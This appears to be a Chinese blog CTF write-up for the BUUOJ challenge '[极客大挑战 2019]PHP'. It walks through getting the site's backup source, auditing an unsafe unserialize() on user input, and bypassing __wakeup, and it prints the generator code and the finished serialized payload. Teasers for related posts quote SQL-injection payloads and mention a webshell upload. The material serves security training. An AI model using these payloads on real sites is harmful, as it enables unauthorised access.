[极客大挑战 2019]PHP

时间：2024-11-02 23:30:26浏览次数：4

标签：username __ 极客序列化 22% 3A% echo 2019 PHP

题目链接：https://buuoj.cn/challenges#[极客大挑战 2019]PHP

打开环境后如下所示。

题目提示 "有一个良好的备份网站的习惯"，因此，尝试爆破一下可能的备份文件名（如：backup.zip、www.zip 等）。

发现该网站的备份文件名为 "www.zip"，下载后，主要有 "index.php" 与 "class.php" 两个源码文件需要审计。

// index.php
<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
      <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{   
        position: absolute;   
        top: 50%;   
        left:50%;   
        margin: -150px 0 0 -150px;   
        width: 300px;   
        height: 300px;   
    }   
    h4{   
        font-size: 2em;   
        margin: 0.67em 0;   
    }
</style>
<body>







<div id="world">
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我！！！
    </div>
    <div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">
    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
    </div>
    <div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</div>
<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>
<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>
<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>
<script  src="index.js"></script>
</body>
</html>

// class.php
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

      
        }
    }
}
?>

可以看到，这一题考察的是选手的基础的 PHP 反序列化知识，源码中要求反序列化后的变量 "username" 为 "admin"，"password" 为 100，但是又存在 __wakeup 函数来初始化变量 "username" 的值，因此说本题的主要考点在于如何绕过 __wakeup 函数的执行。

__wakeup 函数存在一个特性，即，当序列化的字符串中表示对象属性个数的值大于真实的属性个数时，会跳过 __wakeup 魔术方法的执行。

因此，使用如下 PHP 代码，生成一个序列化内容。

<?php

header("Content-type: text/html; charset=gb2312"); 
class Name
{
    private $username = 'admin';
    private $password = 100;
}

$demo = new Name();
$demo_serialize = serialize($demo);

$fp1 = fopen("serialize.txt","a");
fwrite($fp1,$demo_serialize);
fclose($fp1);

$fp2 = fopen("(URL Encode)serialize.txt","a");
fwrite($fp2,urlencode($demo_serialize));
fclose($fp2);
?>

这样，将生成序列化内容：O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D。再根据序列化的规则（O:对象名的长度:"对象名":对象属性个数:{s:属性名的长度:"属性名";s:属性值的长度:"属性值";}），将生成的序列化内容中的 Name 类的对象属性个数从 2 改为 3，即：O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D，发送给后端，即可让后端输出 flag。

标签：username,__,极客,序列化,22%,3A%,echo,2019,PHP
From： https://www.cnblogs.com/imtaieee/p/18522709

[极客大挑战 2019]BabySQL
题目链接：https://buuoj.cn/challenges#[极客大挑战2019]BabySQL打开环境后如下所示。尝试以下几种方法的万能密码：不加单引号。加单引号。加双引号。发现加入了单引号后，有SQL错误提示，但是可以发现，题目似乎过滤了用户输入的"or"。接下来，尝试双写绕过。发现可以成......
[SUCTF 2019]EasySQL
题目链接：https://buuoj.cn/challenges#[SUCTF2019]EasySQL打开环境后，如下所示。尝试输入字符：1。尝试输入字符：0后，发现没有输出结果。尝试输入字符串"aaa"、"bbb"等后，发现都跟输入0的结果一致，而输入123、456等非0的内容，都与输入1一致，这里可以猜测（实际上需要比较......
[强网杯 2019]随便注
题目链接：https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后，如下所示。通过输入'，确认该处是由单引号闭合。通过输入Payload：'unionselect1;#，可以发现后端对一些关键词进行了过滤。尝试堆叠注入，可以查询到数据库名以及当前使用的数据库中存在的表名。Payload：'%......
[极客大挑战 2019]LoveSQL
题目链接：https://buuoj.cn/challenges#[极客大挑战2019]LoveSQL。打开环境后，如下所示。尝试SQL注入（万能密码）。Payload：admin'+or+1%3d1%3b%23。（笔者通过简单粗暴的尝试：①没有使用单引号；②使用单引号；③使用双引号，来确定后端拼接的SQL语句中的password参数系使用单引号......
[极客大挑战 2019]Secret File
题目链接：https://buuoj.cn/challenges#[极客大挑战2019]SecretFile。打开环境后如下所示。通过BurpSuite抓包后，发现页面源代码如下。<!DOCTYPEhtml><html><styletype="text/css">#master{position:absolute;left:44%;bottom:0;text-align:c......
[极客大挑战 2019]Http
题目链接：https://buuoj.cn/challenges#[极客大挑战2019]Http。访问环境如下。该页面的响应包如下。HTTP/1.1200OKDate:Wed,23Oct202416:21:45GMTServer:Apache/2.2.15(CentOS)X-Powered-By:PHP/5.3.3Content-Length:4065Connection:closeContent-Type:te......
[极客大挑战 2019]Upload
题目链接：https://buuoj.cn/challenges#[极客大挑战2019]Upload。打开环境，如下所示。通过页面源代码可以发现，该网站系PHP架构，因此尝试直接上传一句话木马。发现提示"NOT！php!"，因此尝试fuzzing一下后缀名。发现网站可以通过了"phtml"的后缀名，但是提示文件内容存在字符......
php毕业设计基于PHP的电子购物商城在线购物系统商城网站电子产品商城php+mysql+html计
一、功能介绍php在线购物商城电商网站详细技术：HTML+CSS+JS+PHP+MYSQL系统分为用户和管理员两种身份用户功能如下：1.登陆注册2.查看商品详情、蛋糕资讯3.加入购物车、结算订单4.评价5.修改密码6.搜索蛋糕7.退出登录管理员功能如下：1.登录退出2.蛋糕管理（添加、修改和......
基于thinkphp/laravel微信小程序的民宿管理系统8uj93
文章目录项目介绍具体实现截图技术介绍mvc设计模式小程序框架以及目录结构介绍错误处理和异常处理java类核心代码部分展示其他uniapp小程序题目推荐详细视频演示源码获取项目介绍此系统的功能分为用户模块和管理员模块：1、管理员功能（1）个人中心：管理员在个人中心页面......
PHP动物收容所管理系统-计算机毕业设计源码94164
摘要利用PHP语言和相关技术，设计和实现一个高效、可靠的动物收容所管理系统。该系统将提供系统用户、动物信息管理、领养申请处理、志愿者管理、医疗记录管理、捐赠信息、系统管理等功能，旨在促进动物收容所管理工作的便捷和透明化。本研究首先介绍了动物收容所管理系统的研究......

[极客大挑战 2019]PHP

相关文章

赞助商

阅读排行